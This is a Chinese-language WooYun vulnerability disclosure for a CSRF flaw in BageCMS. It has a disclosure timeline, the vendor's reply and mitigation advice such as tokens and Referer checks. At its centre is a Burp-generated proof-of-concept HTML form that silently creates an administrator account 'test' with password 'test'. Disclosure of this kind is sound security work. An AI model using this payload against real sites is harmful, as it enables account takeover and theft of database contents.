bagecms csrf可以获取任意数据 | wooyun-2015-0100519

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0100519

漏洞标题：

bagecms csrf可以获取任意数据

漏洞详情

披露状态：

2015-03-11：细节已通知厂商并且等待厂商处理中
2015-03-11：厂商已经确认，细节仅向厂商公开
2015-03-14：细节向第三方安全合作伙伴开放
2015-05-05：细节向核心白帽子及相关领域专家公开
2015-05-15：细节向普通白帽子公开
2015-05-25：细节向实习白帽子公开
2015-06-09：细节向公众公开

简要描述：

csrf导致可以获取任意数据

详细说明：

增加管理员的时候，burp suite截获，发现存在csrf

csrf poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/bagecms/index.php?r=admini/admin/create" method="POST">
      <input type="hidden" name="Admin&#91;username&#93;" value="test" />
      <input type="hidden" name="Admin&#91;password&#93;" value="test" />
      <input type="hidden" name="Admin&#91;email&#93;" value="test&#64;test&#46;com" />
      <input type="hidden" name="Admin&#91;group&#95;id&#93;" value="1" />
      <input type="hidden" name="Admin&#91;realname&#93;" value="test" />
      <input type="hidden" name="Admin&#91;telephone&#93;" value="" />
      <input type="hidden" name="Admin&#91;mobile&#93;" value="13800138000" />
      <input type="hidden" name="Admin&#91;qq&#93;" value="0" />
      <input type="hidden" name="Admin&#91;notebook&#93;" value="" />
      <input type="hidden" name="Admin&#91;status&#95;is&#93;" value="Y" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

保存为html，发起请求

漏洞证明：

添加管理员成功
管理员登陆，可以获取数据库信息等

修复方案：

建议增加请求url操作的权限，或者增加全局csrf防御
增加token
验证HTTP头的Referer
用XMLHttpRequest附加在header里

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-03-11 12:57

厂商回复：

新版中会修复谢谢~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云